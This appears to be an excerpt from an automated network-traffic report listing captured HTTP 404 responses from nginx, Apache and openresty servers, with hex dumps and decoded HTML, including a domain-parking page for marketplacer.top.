                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:27:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:27:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:27:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:28:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:28:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:28:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:23 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:26 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:28 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.25.3.2Date: Wed, 13 Nov 2024 08:28:31 GMTContent-Type: text/htmlContent-Length: 561Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:51 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:54 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
